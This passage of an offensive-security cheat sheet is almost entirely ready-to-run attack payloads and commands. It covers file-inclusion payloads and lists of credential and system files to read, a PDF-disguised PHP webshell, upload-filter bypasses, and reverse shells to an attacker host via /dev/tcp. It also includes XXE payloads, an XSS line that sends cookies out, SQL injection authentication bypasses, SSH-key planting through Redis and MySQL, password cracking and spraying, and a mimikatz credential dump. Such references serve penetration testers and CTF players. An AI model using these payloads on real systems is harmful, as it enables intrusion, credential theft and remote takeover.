http://<RHOST>/index.php?page=php://filter/convert.base64-encode/resource=index
http://<RHOST>/index.php?page=php://filter/convert.base64-encode/resource=/etc/passwd
base64 -d <FILE>.php

Django, Rails, or Node.js Web Application Header Values

Accept: ../../../../.././../../../../etc/passwd{{
Accept: ../../../../.././../../../../etc/passwd{%0D
Accept: ../../../../.././../../../../etc/passwd{%0A
Accept: ../../../../.././../../../../etc/passwd{%00
Accept: ../../../../.././../../../../etc/passwd{%0D{{
Accept: ../../../../.././../../../../etc/passwd{%0A{{
Accept: ../../../../.././../../../../etc/passwd{%00{{

Linux Files

/etc/passwd
/etc/shadow
/etc/aliases
/etc/anacrontab
/etc/apache2/apache2.conf
/etc/apache2/httpd.conf
/etc/apache2/sites-enabled/000-default.conf
/etc/at.allow
/etc/at.deny
/etc/bashrc
/etc/bootptab
/etc/chrootUsers
/etc/chttp.conf
/etc/cron.allow
/etc/cron.deny
/etc/crontab
/etc/cups/cupsd.conf
/etc/exports
/etc/fstab
/etc/ftpaccess
/etc/ftpchroot
/etc/ftphosts
/etc/groups
/etc/grub.conf
/etc/hosts
/etc/hosts.allow
/etc/hosts.deny
/etc/httpd/access.conf
/etc/httpd/conf/httpd.conf
/etc/httpd/httpd.conf
/etc/httpd/logs/access_log
/etc/httpd/logs/access.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/etc/httpd/php.ini
/etc/httpd/srm.conf
/etc/inetd.conf
/etc/inittab
/etc/issue
/etc/lighttpd.conf
/etc/lilo.conf
/etc/logrotate.d/ftp
/etc/logrotate.d/proftpd
/etc/logrotate.d/vsftpd.log
/etc/lsb-release
/etc/motd
/etc/modules.conf
/etc/motd
/etc/mtab
/etc/my.cnf
/etc/my.conf
/etc/mysql/my.cnf
/etc/network/interfaces
/etc/networks
/etc/npasswd
/etc/passwd
/etc/php4.4/fcgi/php.ini
/etc/php4/apache2/php.ini
/etc/php4/apache/php.ini
/etc/php4/cgi/php.ini
/etc/php4/apache2/php.ini
/etc/php5/apache2/php.ini
/etc/php5/apache/php.ini
/etc/php/apache2/php.ini
/etc/php/apache/php.ini
/etc/php/cgi/php.ini
/etc/php.ini
/etc/php/php4/php.ini
/etc/php/php.ini
/etc/printcap
/etc/profile
/etc/proftp.conf
/etc/proftpd/proftpd.conf
/etc/pure-ftpd.conf
/etc/pureftpd.passwd
/etc/pureftpd.pdb
/etc/pure-ftpd/pure-ftpd.conf
/etc/pure-ftpd/pure-ftpd.pdb
/etc/pure-ftpd/putreftpd.pdb
/etc/redhat-release
/etc/resolv.conf
/etc/samba/smb.conf
/etc/snmpd.conf
/etc/ssh/ssh_config
/etc/ssh/sshd_config
/etc/ssh/ssh_host_dsa_key
/etc/ssh/ssh_host_dsa_key.pub
/etc/ssh/ssh_host_key
/etc/ssh/ssh_host_key.pub
/etc/sysconfig/network
/etc/syslog.conf
/etc/termcap
/etc/vhcs2/proftpd/proftpd.conf
/etc/vsftpd.chroot_list
/etc/vsftpd.conf
/etc/vsftpd/vsftpd.conf
/etc/wu-ftpd/ftpaccess
/etc/wu-ftpd/ftphosts
/etc/wu-ftpd/ftpusers
/logs/pure-ftpd.log
/logs/security_debug_log
/logs/security_log
/opt/lampp/etc/httpd.conf
/opt/xampp/etc/php.ini
/proc/cpuinfo
/proc/filesystems
/proc/interrupts
/proc/ioports
/proc/meminfo
/proc/modules
/proc/mounts
/proc/<PID>/cmdline
/proc/<PID>/maps
/proc/stat
/proc/swaps
/proc/version
/proc/self/net/arp
/proc/self/cwd/app.py
/proc/sched_debug
/proc/net/arp
/proc/net/tcp
/proc/net/udp
/root/anaconda-ks.cfg
/usr/etc/pure-ftpd.conf
/usr/lib/php.ini
/usr/lib/php/php.ini
/usr/local/apache/conf/modsec.conf
/usr/local/apache/conf/php.ini
/usr/local/apache/log
/usr/local/apache/logs
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/usr/local/apache/audit_log
/usr/local/apache/error_log
/usr/local/apache/error.log
/usr/local/cpanel/logs
/usr/local/cpanel/logs/access_log
/usr/local/cpanel/logs/error_log
/usr/local/cpanel/logs/license_log
/usr/local/cpanel/logs/login_log
/usr/local/cpanel/logs/stats_log
/usr/local/etc/httpd/logs/access_log
/usr/local/etc/httpd/logs/error_log
/usr/local/etc/php.ini
/usr/local/etc/pure-ftpd.conf
/usr/local/etc/pureftpd.pdb
/usr/local/lib/php.ini
/usr/local/php4/httpd.conf
/usr/local/php4/httpd.conf.php
/usr/local/php4/lib/php.ini
/usr/local/php5/httpd.conf
/usr/local/php5/httpd.conf.php
/usr/local/php5/lib/php.ini
/usr/local/php/httpd.conf
/usr/local/php/httpd.conf.ini
/usr/local/php/lib/php.ini
/usr/local/pureftpd/etc/pure-ftpd.conf
/usr/local/pureftpd/etc/pureftpd.pdn
/usr/local/pureftpd/sbin/pure-config.pl
/usr/local/www/logs/httpd_log
/usr/local/Zend/etc/php.ini
/usr/sbin/pure-config.pl
/var/adm/log/xferlog
/var/apache2/config.inc
/var/apache/logs/access_log
/var/apache/logs/error_log
/var/cpanel/cpanel.config
/var/lib/mysql/my.cnf
/var/lib/mysql/mysql/user.MYD
/var/local/www/conf/php.ini
/var/log/apache2/access_log
/var/log/apache2/access.log
/var/log/apache2/error_log
/var/log/apache2/error.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/apache-ssl/access.log
/var/log/apache-ssl/error.log
/var/log/auth.log
/var/log/boot
/var/htmp
/var/log/chttp.log
/var/log/cups/error.log
/var/log/daemon.log
/var/log/debug
/var/log/dmesg
/var/log/dpkg.log
/var/log/exim_mainlog
/var/log/exim/mainlog
/var/log/exim_paniclog
/var/log/exim.paniclog
/var/log/exim_rejectlog
/var/log/exim/rejectlog
/var/log/faillog
/var/log/ftplog
/var/log/ftp-proxy
/var/log/ftp-proxy/ftp-proxy.log
/var/log/httpd-access.log
/var/log/httpd/access_log
/var/log/httpd/access.log
/var/log/httpd/error_log
/var/log/httpd/error.log
/var/log/httpsd/ssl.access_log
/var/log/httpsd/ssl_log
/var/log/kern.log
/var/log/lastlog
/var/log/lighttpd/access.log
/var/log/lighttpd/error.log
/var/log/lighttpd/lighttpd.access.log
/var/log/lighttpd/lighttpd.error.log
/var/log/mail.info
/var/log/mail.log
/var/log/maillog
/var/log/mail.warn
/var/log/message
/var/log/messages
/var/log/mysqlderror.log
/var/log/mysql.log
/var/log/mysql/mysql-bin.log
/var/log/mysql/mysql.log
/var/log/mysql/mysql-slow.log
/var/log/proftpd
/var/log/pureftpd.log
/var/log/pure-ftpd/pure-ftpd.log
/var/log/secure
/var/log/vsftpd.log
/var/log/wtmp
/var/log/xferlog
/var/log/yum.log
/var/mysql.log
/var/run/utmp
/var/spool/cron/crontabs/root
/var/webmin/miniserv.log
/var/www/html<VHOST>/__init__.py
/var/www/html/db_connect.php
/var/www/html/utils.php
/var/www/log/access_log
/var/www/log/error_log
/var/www/logs/access_log
/var/www/logs/error_log
/var/www/logs/access.log
/var/www/logs/error.log
~/.atfp_history
~/.bash_history
~/.bash_logout
~/.bash_profile
~/.bashrc
~/.gtkrc
~/.login
~/.logout
~/.mysql_history
~/.nano_history
~/.php_history
~/.profile
~/.ssh/authorized_keys
~/.ssh/id_dsa
~/.ssh/id_dsa.pub
~/.ssh/id_rsa
~/.ssh/id_rsa.pub
~/.ssh/identity
~/.ssh/identity.pub
~/.viminfo
~/.wm_style
~/.Xdefaults
~/.xinitrc
~/.Xresources
~/.xsession

Windows Files

C:/Users/Administrator/NTUser.dat
C:/Documents and Settings/Administrator/NTUser.dat
C:/apache/logs/access.log
C:/apache/logs/error.log
C:/apache/php/php.ini
C:/boot.ini
C:/inetpub/wwwroot/global.asa
C:/MySQL/data/hostname.err
C:/MySQL/data/mysql.err
C:/MySQL/data/mysql.log
C:/MySQL/my.cnf
C:/MySQL/my.ini
C:/php4/php.ini
C:/php5/php.ini
C:/php/php.ini
C:/Program Files/Apache Group/Apache2/conf/httpd.conf
C:/Program Files/Apache Group/Apache/conf/httpd.conf
C:/Program Files/Apache Group/Apache/logs/access.log
C:/Program Files/Apache Group/Apache/logs/error.log
C:/Program Files/FileZilla Server/FileZilla Server.xml
C:/Program Files/MySQL/data/hostname.err
C:/Program Files/MySQL/data/mysql-bin.log
C:/Program Files/MySQL/data/mysql.err
C:/Program Files/MySQL/data/mysql.log
C:/Program Files/MySQL/my.ini
C:/Program Files/MySQL/my.cnf
C:/Program Files/MySQL/MySQL Server 5.0/data/hostname.err
C:/Program Files/MySQL/MySQL Server 5.0/data/mysql-bin.log
C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.err
C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.log
C:/Program Files/MySQL/MySQL Server 5.0/my.cnf
C:/Program Files/MySQL/MySQL Server 5.0/my.ini
C:/Program Files (x86)/Apache Group/Apache2/conf/httpd.conf
C:/Program Files (x86)/Apache Group/Apache/conf/httpd.conf
C:/Program Files (x86)/Apache Group/Apache/conf/access.log
C:/Program Files (x86)/Apache Group/Apache/conf/error.log
C:/Program Files (x86)/FileZilla Server/FileZilla Server.xml
C:/Program Files (x86)/xampp/apache/conf/httpd.conf
C:/WINDOWS/php.ini
C:/WINDOWS/Repair/SAM
C:/Windows/repair/system
C:/Windows/repair/software
C:/Windows/repair/security
C:/WINDOWS/System32/drivers/etc/hosts
C:/Windows/win.ini
C:/WINNT/php.ini
C:/WINNT/win.ini
C:/xampp/apache/bin/php.ini
C:/xampp/apache/logs/access.log
C:/xampp/apache/logs/error.log
C:/Windows/Panther/Unattend/Unattended.xml
C:/Windows/Panther/Unattended.xml
C:/Windows/debug/NetSetup.log
C:/Windows/system32/config/AppEvent.Evt
C:/Windows/system32/config/SecEvent.Evt
C:/Windows/system32/config/default.sav
C:/Windows/system32/config/security.sav
C:/Windows/system32/config/software.sav
C:/Windows/system32/config/system.sav
C:/Windows/system32/config/regback/default
C:/Windows/system32/config/regback/sam
C:/Windows/system32/config/regback/security
C:/Windows/system32/config/regback/system
C:/Windows/system32/config/regback/software
C:/Program Files/MySQL/MySQL Server 5.1/my.ini
C:/Windows/System32/inetsrv/config/schema/ASPNET_schema.xml
C:/Windows/System32/inetsrv/config/applicationHost.config
C:/inetpub/logs/LogFiles/W3SVC1/u_ex[YYMMDD].log

PDF PHP Inclusion

Create a file with a PDF header, which contains PHP code.

%PDF-1.4

<?php
    system($_GET["cmd"]);
?>

http://<RHOST>/index.php?page=uploads/<FILE>.pdf%00&cmd=whoami

PHP Upload Filter Bypasses

.sh
.cgi
.inc
.txt
.pht
.phtml
.phP
.Php
.php3
.php4
.php5
.php7
.pht
.phps
.phar
.phpt
.pgif
.phtml
.phtm
.php%00.jpeg

<FILE>.php%20
<FILE>.php%0d%0a.jpg
<FILE>.php%0a
<FILE>.php.jpg
<FILE>.php%00.gif
<FILE>.php\x00.gif
<FILE>.php%00.png
<FILE>.php\x00.png
<FILE>.php%00.jpg
<FILE>.php\x00.jpg
mv <FILE>.jpg <FILE>.php\x00.jpg

PHP Filter Chain Generator

https://github.com/synacktiv/php_filter_chain_generator

python3 php_filter_chain_generator.py --chain '<?= exec($_GET[0]); ?>'
python3 php_filter_chain_generator.py --chain "<?php echo shell_exec(id); ?>"
python3 php_filter_chain_generator.py --chain """<?php echo shell_exec(id); ?>"""
python3 php_filter_chain_generator.py --chain """"<?php exec(""/bin/bash -c 'bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1'"");?>""""
python3 php_filter_chain_generator.py --chain """"<?php exec(""/bin/bash -c 'bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1'"");?>""""

http://<RHOST>/?page=php://filter/convert.base64-decode/resource=PD9waHAgZWNobyBzaGVsbF9leGVjKGlkKTsgPz4

python3 php_filter_chain_generator.py --chain '<?= exec($_GET[0]); ?>'
[+] The following gadget chain will generate the following code : <?= exec($_GET[0]); ?> (base64 value: PD89IGV4ZWMoJF9HRVRbMF0pOyA/Pg)
php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|<--- SNIP --->|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp&0=<COMMAND>

PHP Generic Gadget Chains (PHPGGC)

phpggc -u --fast-destruct Guzzle/FW1 /dev/shm/<FILE>.txt /PATH/TO/FILE/<FILE>.txt

Server-Side Request Forgery (SSRF)

https://<RHOST>/item/2?server=server.<RHOST>/file?id=9&x=

Server-Side Template Injection (SSTI)

Fuzz String

https://cobalt.io/blog/a-pentesters-guide-to-server-side-template-injection-ssti

${{<%[%'"}}%\.

Magic Payload

https://medium.com/@nyomanpradipta120/ssti-in-flask-jinja2-20b068fdaeee

{{ ‘’.__class__.__mro__[1].__subclasses__() }}

Upload Vulnerabilities

ASP / ASPX / PHP / PHP3 / PHP5: Webshell / Remote Code Execution
SVG: Stored XSS / Server-Side Request Forgery
GIF: Stored XSS
CSV: CSV Injection
XML: XXE
AVI: Local File Inclusion / Server-Side request Forgery
HTML/JS: HTML Injection / XSS / Open Redirect
PNG / JPEG: Pixel Flood Attack
ZIP: Remote Code Exection via Local File Inclusion
PDF / PPTX: Server-Side Request Forgery / Blind XXE

wfuzz

wfuzz -w /usr/share/wfuzz/wordlist/general/big.txt -u http://<RHOST>/FUZZ/<FILE>.php --hc '403,404'

Write to File

wfuzz -w /PATH/TO/WORDLIST -c -f <FILE> -u http://<RHOST> --hc 403,404

Custom Scan with limited Output

wfuzz -w /PATH/TO/WORDLIST -u http://<RHOST>/dev/304c0c90fbc6520610abbf378e2339d1/db/file_FUZZ.txt --sc 200 -t 20

Fuzzing two Parameters at once

wfuzz -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt -u http://<RHOST>:/<directory>/FUZZ.FUZ2Z -z list,txt-php --hc 403,404 -c

Domain

wfuzz --hh 0 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H 'Host: FUZZ.<RHOST>' -u http://<RHOST>/

Subdomain

wfuzz -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.<RHOST>" --hc 200 --hw 356 -t 100 <RHOST>

Git

wfuzz -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-files-lowercase.txt -u http://<RHOST>/FUZZ --hc 403,404

Login

wfuzz -X POST -u "http://<RHOST>:<RPORT>/login.php" -d "email=FUZZ&password=<PASSWORD>" -w /PATH/TO/WORDLIST/<WORDLIST>.txt --hc 200 -c
wfuzz -X POST -u "http://<RHOST>:<RPORT>/login.php" -d "username=FUZZ&password=<PASSWORD>" -w /PATH/TO/WORDLIST/<WORDLIST>.txt --ss "Invalid login"

SQL

wfuzz -c -z file,/usr/share/wordlists/seclists/Fuzzing/SQLi/Generic-SQLi.txt -d 'db=FUZZ' --hl 16 http://<RHOST>/select http

DNS

wfuzz -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Origin: http://FUZZ.<RHOST>" --filter "r.headers.response~'Access-Control-Allow-Origin'" http://<RHOST>/
wfuzz -c -w /usr/share/wordlists/secLists/Discovery/DNS/subdomains-top1million-110000.txt --hc 400,404,403 -H "Host: FUZZ.<RHOST>" -u http://<RHOST> -t 100
wfuzz -c -w /usr/share/wordlists/secLists/Discovery/DNS/subdomains-top1million-110000.txt --hc 400,403,404 -H "Host: FUZZ.<RHOST>" -u http://<RHOST> --hw <value> -t 100

Numbering Files

wfuzz -w /usr/share/wordlists/seclists/Fuzzing/4-digits-0000-9999.txt --hw 31 http://10.13.37.11/backups/backup_2021052315FUZZ.zip

Enumerating PIDs

wfuzz -u 'http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc/FUZZ/cmdline' -z range,900-1000

WPScan

wpscan --url https://<RHOST> --disable-tls-checks
wpscan --url https://<RHOST> --disable-tls-checks --enumerate u
target=<RHOST>; wpscan --url http://$target:80 --enumerate u,t,p | tee $target-wpscan-enum
wpscan --url http://<RHOST> -U <USERNAME> -P passwords.txt -t 50

XML External Entity (XXE)

Skeleton Payload Request

GET / HTTP/1.1
Host: <RHOST>:<RPORT>
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Length: 136

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE test [<!ENTITY xxe SYSTEM "http://<LHOST>:80/shell.php" >]>
<foo>&xxe;</foo>

Payloads

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE xxe [ <!ENTITY passwd SYSTEM 'file:///etc/passwd'> ]>
 <stockCheck><productId>&passwd;</productId><storeId>1</storeId></stockCheck>

<?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///c:/windows/win.ini'>]><order><quantity>3</quantity><item>&test;</item><address>17th Estate, CA</address></order>

username=%26username%3b&version=1.0.0--><!DOCTYPE+username+[+<!ENTITY+username+SYSTEM+"/root/.ssh/id_rsa">+]><!--

Cross-Site Scripting (XSS)

<sCrIpt>alert(1)</ScRipt>
<script>alert('XSS');</script>
<script>alert(document.cookies)</script>
<script>document.querySelector('#foobar-title').textContent = '<TEXT>'</script>
<script>fetch('https://<RHOST>/steal?cookie=' + btoa(document.cookie));</script>
<script>user.changeEmail('user@domain');</script>
<iframe src=file:///etc/passwd height=1000px width=1000px></iframe>
<img src='http://<RHOST>'/>

Database Analysis

MongoDB

mongo "mongodb://localhost:27017"

> use <DATABASE>;
> show tables;
> show collections;
> db.system.keys.find();
> db.users.find();
> db.getUsers();
> db.getUsers({showCredentials: true});
> db.accounts.find();
> db.accounts.find().pretty();
> use admin;

User Password Reset to "12345"

> db.getCollection('users').update({username:"admin"}, { $set: {"services" : { "password" : {"bcrypt" : "$2a$10$n9CM8OgInDlwpvjLKLPML.eizXIzLlRtgCh3GRLafOdR9ldAUh/KG" } } } })

MSSQL

Show Database Content

1> SELECT name FROM master.sys.databases
2> go

OPENQUERY

1> select * from openquery("web\clients", 'select name from master.sys.databases');
2> go

1> select * from openquery("web\clients", 'select name from clients.sys.objects');
2> go

Binary Extraction as Base64

1> select cast((select content from openquery([web\clients], 'select * from clients.sys.assembly_files') where assembly_id = 65536) as varbinary(max)) for xml path(''), binary base64;
2> go > export.txt

MySQL

mysql -u root -p
mysql -u <USERNAME> -h <RHOST> -p

> show databases;
> use <DATABASE>;
> show tables;
> describe <TABLE>;
> SELECT * FROM Users;
> SELECT Username,Password FROM Users;

Update User Password

mysql> update user set password = '37b08599d3f323491a66feabbb5b26af' where user_id = 1;

Drop a Shell

mysql> \! /bin/sh

xp_cmdshell

SQL> EXEC sp_configure 'Show Advanced Options', 1;
SQL> reconfigure;
SQL> sp_configure;
SQL> EXEC sp_configure 'xp_cmdshell', 1;
SQL> reconfigure
SQL> xp_cmdshell "whoami"

SQL> enable_xp_cmdshell
SQL> xp_cmdshell whoami

Insert Code to get executed

mysql> insert into users (id, email) values (<LPORT>, "- E $(bash -c 'bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1')");

Write SSH Key into authorized_keys2 file

mysql> SELECT "<KEY>" INTO OUTFILE '/root/.ssh/authorized_keys2' FIELDS TERMINATED BY '' OPTIONALLY ENCLOSED BY '' LINES TERMINATED BY '\n';

Linked SQL Server Enumeration

SQL> SELECT user_name();
SQL> SELECT name,sysadmin FROM syslogins;
SQL> SELECT srvname,isremote FROM sysservers;
SQL> EXEC ('SELECT current_user') at [<DOMAIN>\<CONFIG_FILE>];
SQL> EXEC ('SELECT srvname,isremote FROM sysservers') at [<DOMAIN>\<CONFIG_FILE>];
SQL> EXEC ('EXEC (''SELECT suser_name()'') at [<DOMAIN>\<CONFIG_FILE>]') at [<DOMAIN>\<CONFIG_FILE>];

NoSQL Injection

admin'||''==='
{"username": {"$ne": null}, "password": {"$ne": null} }

PostgreSQL

$ psql
$ psql -h <RHOST> -p 5432 -U <USERNAME> -d <DATABASE>
$ psql -h <RHOST> -p 5432 -U <USERNAME> -d <DATABASE>

Common Commands

postgres=# \c
postgres=# \list
postgres=# \c  <DATABASE>
<DATABASE>=# \dt
<DATABASE>=# \du
<DATABASE>=# TABLE <TABLE>;
<DATABASE>=# SELECT * FROM users;
<DATABASE>=# \q

Redis

> AUTH <PASSWORD>
> AUTH <USERNAME> <PASSWORD>
> INFO SERVER
> INFO keyspace
> CONFIG GET *
> SELECT <NUMBER>
> KEYS *
> GET PHPREDIS_SESSION:2a9mbvnjgd6i2qeqcubgdv8n4b
> SET PHPREDIS_SESSION:2a9mbvnjgd6i2qeqcubgdv8n4b "username|s:8:\"<USERNAME>\";role|s:5:\"admin\";auth|s:4:\"True\";" # the value "s:8" has to match the length of the username

Enter own SSH Key

redis-cli -h <RHOST>
echo "FLUSHALL" | redis-cli -h <RHOST>
(echo -e "\n\n"; cat ~/.ssh/id_rsa.pub; echo -e "\n\n") > /PATH/TO/FILE/<FILE>.txt
cat /PATH/TO/FILE/<FILE>.txt | redis-cli -h <RHOST> -x set s-key
<RHOST>:6379> get s-key
<RHOST>:6379> CONFIG GET dir
1) "dir"
2) "/var/lib/redis"
<RHOST>:6379> CONFIG SET dir /var/lib/redis/.ssh
OK
<RHOST>:6379> CONFIG SET dbfilename authorized_keys
OK
<RHOST>:6379> CONFIG GET dbfilename
1) "dbfilename"
2) "authorized_keys"
<RHOST>:6379> save
OK

sqlcmd

sqlcmd -S <RHOST> -U <USERNAME>

SQL Injection

Master List

admin' or '1'='1
' or '1'='1
" or "1"="1
" or "1"="1"--
" or "1"="1"/*
" or "1"="1"#
" or 1=1
" or 1=1 --
" or 1=1 -
" or 1=1--
" or 1=1/*
" or 1=1#
" or 1=1-
") or "1"="1
") or "1"="1"--
") or "1"="1"/*
") or "1"="1"#
") or ("1"="1
") or ("1"="1"--
") or ("1"="1"/*
") or ("1"="1"#
) or '1`='1-

Authentication Bypass

'-'
' '
'&'
'^'
'*'
' or 1=1 limit 1 -- -+
'="or'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
'-||0'
"-||0"
"-"
" "
"&"
"^"
"*"
'--'
"--"
'--' / "--"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
or 2 like 2
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' -- -
admin' #
admin'/*
admin' or '2' LIKE '1
admin' or 2 LIKE 2--
admin' or 2 LIKE 2#
admin') or 2 LIKE 2#
admin') or 2 LIKE 2--
admin') or ('2' LIKE '2
admin') or ('2' LIKE '2'#
admin') or ('2' LIKE '2'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin';-- azer
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055

SQL Truncation Attack

'admin@<FQDN>' = 'admin@<FQDN>++++++++++++++++++++++++++++++++++++++htb'

sqlite3

sqlite3 <DATABASE>.db
sqlite> .tables
sqlite> select * from users;

sqsh

sqsh -S <RHOST> -U <USERNAME>

Password Attacks

CrackMapExec

crackmapexec smb <RHOST> -u '' -p '' --shares
crackmapexec smb <RHOST> -u '' -p '' --shares -M spider_plus
crackmapexec smb <RHOST> -u <USERNAME> -p <PASSWORD> --shares
crackmapexec winrm -u usernames.txt -p '<PASSWORD>' -d <DOMAIN> <RHOST>
crackmapexec winrm <RHOST> -u ~/PATH/TO/FILE/usernames.txt -p /usr/share/wordlists/rockyou.txt
crackmapexec <RHOST> -u ~/PATH/TO/FILE/usernames.txt -p /usr/share/wordlists/rockyou.txt --shares
crackmapexec <RHOST> -u ~/PATH/TO/FILE/usernames.txt -p /usr/share/wordlists/rockyou.txt --pass-pol
crackmapexec <RHOST> -u ~/PATH/TO/FILE/usernames.txt -p /usr/share/wordlists/rockyou.txt --lusers
crackmapexec <RHOST> -u ~/PATH/TO/FILE/usernames.txt -p /usr/share/wordlists/rockyou.txt --sam
crackmapexec <RHOST> -u ~/PATH/TO/FILE/usernames.txt -p /usr/share/wordlists/rockyou.txt -x 'net user Administrator /domain' --exec-method smbexec
crackmapexec <RHOST> -u ~/PATH/TO/FILE/usernames.txt -p /usr/share/wordlists/rockyou.txt --wdigest enable
crackmapexec <RHOST> -u ~/PATH/TO/FILE/usernames.txt -p /usr/share/wordlists/rockyou.txt -x 'quser'
crackmapexec <RHOST> -u ~/PATH/TO/FILE/usernames.txt -p /usr/share/wordlists/rockyou.txt -m modules/credentials/mimikatz.py

fcrack

fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt <FILE>.zip

hashcat

https://hashcat.net/hashcat/

https://hashcat.net/wiki/doku.php?id=hashcat

https://hashcat.net/cap2hashcat/

https://hashcat.net/wiki/doku.php?id=example_hashes

hashcat --example-hashes

hashcat -m 0 md5 /usr/share/wordlists/rockyou.txt
hashcat -m 100 sha-1 /usr/share/wordlists/rockyou.txt
hashcat -m 1400 sha256 /usr/share/wordlists/rockyou.txt
hashcat -m 3200 bcrypt /usr/share/wordlists/rockyou.txt
hashcat -m 900 md4 /usr/share/wordlists/rockyou.txt
hashcat -m 1000 ntlm /usr/share/wordlists/rockyou.txt
hashcat -m 1800 sha512 /usr/share/wordlists/rockyou.txt
hashcat -m 160 hmac-sha1 /usr/share/wordlists/rockyou.txt
hashcat -a 0 -m 0 hash.txt SecLists/Passwords/xato-net-10-million-passwords-1000000.txt -O --force
hashcat -O -m 500 -a 3 -1 ?l -2 ?d -3 ?u  --force hash.txt ?3?3?1?1?1?1?2?3

Cracking ASPREPRoast Password File

hashcat -m 18200 -a 0 <FILE> <FILE>

Cracking Kerberoasting Password File

hashcat -m 13100 --force <FILE> <FILE>

Bruteforce based on the Pattern

hashcat -a3 -m0 mantas?d?d?d?u?u?u --force --potfile-disable --stdout

Generate Password Candidates: Wordlist + Pattern

hashcat -a6 -m0 "e99a18c428cb38d5f260853678922e03" yourPassword|/usr/share/wordlists/rockyou.txt ?d?d?d?u?u?u --force --potfile-disable --stdout

Generate NetNLTMv2 with internalMonologue and crack with hashcat

InternalMonologue.exe -Downgrade False -Restore False -Impersonate True -Verbose False -challange 002233445566778888800

Result

spotless::WS01:1122334455667788:26872b3197acf1da493228ac1a54c67c:010100000000000078b063fbcce8d4012c90747792a3cbca0000000008003000300000000000000001000000002000006402330e5e71fb781eef13937448bf8b0d8bc9e2e6a1e1122fd9d690fa9178c50a0010000000000000000000000000000000000009001a0057005300300031005c00730070006f0074006c006500730073000000000000000000

Crack with hashcat

hashcat -m5600 'spotless::WS01:1122334455667788:26872b3197acf1da493228ac1a54c67c:010100000000000078b063fbcce8d4012c90747792a3cbca0000000008003000300000000000000001000000002000006402330e5e71fb781eef13937448bf8b0d8bc9e2e6a1e1122fd9d690fa9178c50a0010000000000000000000000000000000000009001a0057005300300031005c00730070006f0074006c006500730073000000000000000000' -a 3 /usr/share/wordlists/rockyou.txt --force --potfile-disable

Rules

https://github.com/NotSoSecure/password_cracking_rules/blob/master/OneRuleToRuleThemAll.rule

Cracking with OneRuleToRuleThemAll.rule

hashcat -m 3200 hash.txt -r /PATH/TO/FILE.rule

Hydra

hydra <RHOST> -l <USERNAME> -P /usr/share/wordlists/list ftp|ssh|smb://<RHOST>

export HYDRA_PROXY=connect://127.0.0.1:8080
unset HYDRA_PROXY

hydra -l <USERNAME> -P /usr/share/wordlists/rockyou.txt <RHOST> http-post-form "/admin.php:username=^USER^&password=^PASS^:login_error"

hydra <RHOST> http-post-form -L /usr/share/wordlists/list "/login:usernameField=^USER^&passwordField=^PASS^:unsuccessfulMessage" -s <RPORT> -P /usr/share/wordlists/list

hydra <RHOST> http-form-post "/otrs/index.pl:Action=Login&RequestedURL=Action=Admin&User=root@localhost&Password=^PASS^:Login failed" -l root@localhost -P otrs-cewl.txt -vV -f

hydra -l admin -P /usr/share/wordlists/rockyou.txt <RHOST> http-post-form "/Account/login.aspx?ReturnURL=/admin/:__VIEWSTATE=COOKIE_1&__EVENTVALIDATION=COOKIE_2&UserName=^USER^&Password=^PASS^&LoginButton=Log+in:Login failed"

John

/usr/share/john/ssh2john.py id_rsa > hash
john hash --wordlist=/usr/share/wordlists/rockyou.txt <FILE>
john --rules --wordlist=/usr/share/wordlists/rockyou.txt <FILE>
john --show <FILE>

Kerbrute

User Enumeration

./kerbrute userenum -d <DOMAIN> --dc <DOMAIN> /PATH/TO/FILE/<USERNAMES>

Password Spray

./kerbrute passwordspray -d <DOMAIN> --dc <DOMAIN> /PATH/TO/FILE/<USERNAMES> <PASSWORD>

LaZagne

laZagne.exe all

mimikatz

Dump Hshes

mimikatz.exe
sekurlsa::minidump /users/admin/Desktop/lsass.DMP
